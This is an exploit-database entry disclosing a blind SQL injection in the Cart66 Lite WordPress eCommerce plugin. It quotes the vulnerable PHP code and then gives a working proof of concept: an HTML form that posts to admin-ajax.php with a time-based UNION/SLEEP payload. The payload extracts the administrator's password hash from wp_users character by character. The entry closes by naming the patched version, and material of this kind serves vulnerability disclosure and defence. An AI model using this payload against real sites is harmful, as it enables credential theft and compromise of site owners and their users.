WordPress Plugin Cart66 Lite eCommerce - Blind SQL Injection

Type exploitpack
Reporter Kacper Szurek
Modified 2014-12-03T00:00:00


WordPress Plugin Cart66 Lite eCommerce - Blind SQL Injection

                                            # Exploit Title: Cart66 Lite WordPress Ecommerce Blind SQL Injection
# Date: 29-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/cart66-lite.
# Category: webapps
1. Description
Cart66Ajax::shortcodeProductsTable() is accessible for every registered user.

$postId is not escaped correctly (only html tags are stripped).

File: cart66-lite\models\Cart66Ajax.php
public static function shortcodeProductsTable() {
    global $wpdb;
    $prices = array();
    $types = array();
    $postId = Cart66Common::postVal('id');
    $product = new Cart66Product();
    $products = $product->getModels("where id=$postId", "order by name");
    $data = array();

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):

<form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="shortcode_products_table">
    Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- ">
    <input value="Hack" type="submit">

This SQL will check if first password character user ID=1 is “$”.

If yes, it will sleep 5 seconds.
3. Solution:
Update to version 1.5.2